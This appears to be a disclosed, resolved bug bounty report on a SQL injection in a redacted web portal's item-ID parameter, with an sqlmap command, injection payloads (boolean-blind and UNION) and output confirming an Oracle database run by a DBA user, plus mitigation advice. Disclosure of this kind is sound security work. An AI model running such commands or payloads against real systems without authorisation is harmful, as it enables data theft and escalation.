SQL Injection vulnerability located at ████████
High
Vulnerability Details
**Summary:**
I have found a SQL Injection at ███████ in the ████ Portal.
**Description:**
The SQL injection is caused by the unsanitized parameter `_itemID=`. I immediately stopped testing when I verified it was possible to get the current user and version of the database.
1. The vulnerable URL is:
`https://█████/███Portal/█████?_██████=true&_st=&_pageLabel=█████████_███████_pubview_page&CCD_itemID=201826*`
2. Use sqlmap (https://github.com/sqlmapproject/sqlmap) with the following command:
```bash
python sqlmap.py -u "https://██████/████████Portal/██████████?_█████=true&_st=&_pageLabel=███_██████_pubview_page&CCD_itemID=201826*" --random-agent --current-user --is-dba
```
sqlmap output:
```
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: https://███████:443/███████Portal/████?_███=true&_st=&_pageLabel=███_█████_pubview_page&CCD_itemID=201826 AND 2833=2833
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: https://██████████:443/████Portal/██████████?_███=true&_st=&_pageLabel=███_██████████_pubview_page&CCD_itemID=201826 UNION ALL SELECT NULL,CONCAT(CONCAT('qvzxq','ODiUngdWPubxHGXaEEDvfcozGjVAMxIqpHmWfTVJ'),'qbbxq') FROM VERSIONS-- AQYh
---
[22:37:56] [INFO] testing SAP MaxDB
[22:37:57] [WARNING] the back-end DBMS is not SAP MaxDB
[22:37:57] [INFO] testing MySQL
[22:37:58] [WARNING] the back-end DBMS is not MySQL
[22:37:58] [INFO] testing Oracle
[22:37:59] [INFO] confirming Oracle
[22:38:01] [INFO] the back-end DBMS is Oracle
web application technology: Apache, Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[22:38:01] [INFO] fetching current user
current user: ██████████
[22:38:02] [INFO] testing if current user is DBA
current user is DBA: True
```
## Screenshot
{F322498}
## Suggested Mitigation/Remediation Actions
Sanitize the `_itemID=` parameter by using prepared statements or other forms of input sanitization.
## Impact
It could be possible for an attacker to retrieve data and, depending on the data stored in the database (passwords), to pivot further and get RCE, since the current user in the database has DBA rights.
## Report Stats
- Report ID: 384397
- State: Closed
- Substate: resolved
- Upvotes: 44